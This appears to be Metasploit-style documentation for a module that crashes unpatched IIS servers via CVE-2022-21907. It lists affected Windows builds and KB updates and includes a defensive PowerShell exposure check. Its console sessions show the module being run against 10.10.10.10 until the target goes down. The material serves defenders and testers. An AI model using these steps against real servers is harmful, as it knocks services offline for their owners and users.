
rb_dos_iis_2022_21907.md


Vulnerable Application

An IIS web server that does not have the corresponding update (KB) installed:

  • Windows 10 Version 1809 and Windows Server 2019 (including Core): KB5009557
  • Windows 10 (Versions 20H2, 21H1, 21H2) and Windows Server Version 20H2 (including Core): KB5009543
  • Windows 11: KB5009566
  • Windows Server 2022 (including Core): KB5009555

and that has the DWORD value EnableTrailerSupport enabled under the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HTTP\Parameters.
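
A local check for the two conditions above, added here as an example for administrators (it is not part of the module or its documentation). The function names are hypothetical; the KB IDs and registry path are the ones listed above, and a non-zero DWORD is assumed to mean "enabled".

```powershell
# Added example, not part of the module: report whether this host matches the
# "Vulnerable Application" conditions listed above.
$FixKbs  = 'KB5009557', 'KB5009543', 'KB5009566', 'KB5009555'
$HttpKey = 'HKLM:\System\CurrentControlSet\Services\HTTP\Parameters'

function Get-TrailerSupportState {
    # Returns the DWORD value if present, otherwise $null (absent = not enabled).
    $p = Get-ItemProperty -Path $HttpKey -Name EnableTrailerSupport -ErrorAction SilentlyContinue
    if ($null -eq $p) { return $null }
    return [int]$p.EnableTrailerSupport
}

function Get-IisTrailerExposure {
    $trailer = Get-TrailerSupportState

    # Get-HotFix only lists updates still recorded as installed. A later
    # cumulative update replaces these KBs, so "not listed" is not proof that
    # the fix is missing; confirm against the OS build in that case.
    $listed = @(Get-HotFix -Id $FixKbs -ErrorAction SilentlyContinue |
                Select-Object -ExpandProperty HotFixID)

    $os = Get-CimInstance -ClassName Win32_OperatingSystem

    $assessment = if ($listed.Count -gt 0) {
        'Fix KB installed'
    } elseif ($trailer) {
        'Review now: trailer support enabled and fix KB not listed'
    } else {
        'Trailer support not enabled; still confirm patch level'
    }

    [pscustomobject]@{
        ComputerName         = $env:COMPUTERNAME
        OS                   = $os.Caption
        Build                = $os.Version
        EnableTrailerSupport = $trailer
        ListedFixKb          = $listed -join ','
        Assessment           = $assessment
    }
}

Get-IisTrailerExposure | Format-List
```

Because cumulative updates supersede one another, treat "fix KB not listed" as a prompt to compare the reported build against the update history for that Windows version, not as a final verdict.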

Weak configuration

Source

Options

RHOST

  • Required
  • Type: address
  • No default value

The address of the vulnerable IIS server.

RPORT

  • Required
  • Type: integer
  • Default value: 80

The port of the vulnerable IIS server.

TARGETURI

  • Optional
  • Type: string
  • Default value: /

Scenarios

msf6 > use exploit/windows/iis/rb_dos_iis_2022_21907 
msf6 auxiliary(windows/iis/rb_dos_iis_2022_21907) > set RHOST 10.10.10.10
RHOST => 10.10.10.10
msf6 auxiliary(windows/iis/rb_dos_iis_2022_21907) > exploit
[*] Running module against 10.10.10.10

[+] Target is down.
[*] Auxiliary module execution completed
msf6 auxiliary(windows/iis/rb_dos_iis_2022_21907) >

msf6 > use exploit/windows/iis/rb_dos_iis_2022_21907 
msf6 auxiliary(windows/iis/rb_dos_iis_2022_21907) > set RHOST 10.10.10.10
RHOST => 10.10.10.10
msf6 auxiliary(windows/iis/rb_dos_iis_2022_21907) > set RPORT 80
RPORT => 80
msf6 auxiliary(windows/iis/rb_dos_iis_2022_21907) > set TARGETURI "/test/"
TARGETURI => /test/
msf6 auxiliary(windows/iis/rb_dos_iis_2022_21907) > set VERBOSE true
VERBOSE => true
msf6 auxiliary(windows/iis/rb_dos_iis_2022_21907) > exploit
[*] Running module against 10.10.10.10

[*] Trying first connection...
[+] First connection OK. Sending payload...
[+] Payload is sent. Check that the server is down...
[-] The connection was refused by the remote host (10.10.10.10:80).
[+] Target is down.
[*] Auxiliary module execution completed
msf6 auxiliary(windows/iis/rb_dos_iis_2022_21907) >

Reference